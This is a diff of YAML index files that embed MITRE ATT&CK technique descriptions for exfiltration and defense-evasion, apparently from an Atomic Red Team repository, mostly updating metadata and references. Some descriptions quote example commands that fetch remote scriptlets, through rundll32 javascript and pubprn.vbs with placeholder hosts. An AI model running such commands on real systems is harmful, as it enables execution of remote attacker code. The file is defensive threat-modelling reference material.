+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -61543,7 +62424,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -61569,7 +62449,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -61602,13 +62482,11 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests: []
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -61657,12 +62535,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -61698,12 +62575,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -61712,7 +62588,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -61736,9 +62611,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests: []
   T1052.001:
@@ -61761,7 +62635,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61783,8 +62657,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -61835,7 +62707,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -61885,7 +62756,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -61910,7 +62780,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -61933,13 +62803,11 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests: []
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -61980,9 +62848,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -62030,7 +62897,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -62052,7 +62918,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -62076,12 +62942,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -62145,6 +63009,5 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests: []
diff --git a/atomics/Indexes/iaas_gcp-index.yaml b/atomics/Indexes/iaas_gcp-index.yaml
index ddb6094288..60a29d554c 100644
--- a/atomics/Indexes/iaas_gcp-index.yaml
+++ b/atomics/Indexes/iaas_gcp-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -518,7 +537,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -588,7 +605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -666,7 +682,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests: []
   T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -870,12 +883,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -901,11 +989,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -950,12 +1037,11 @@ defense-evasion:
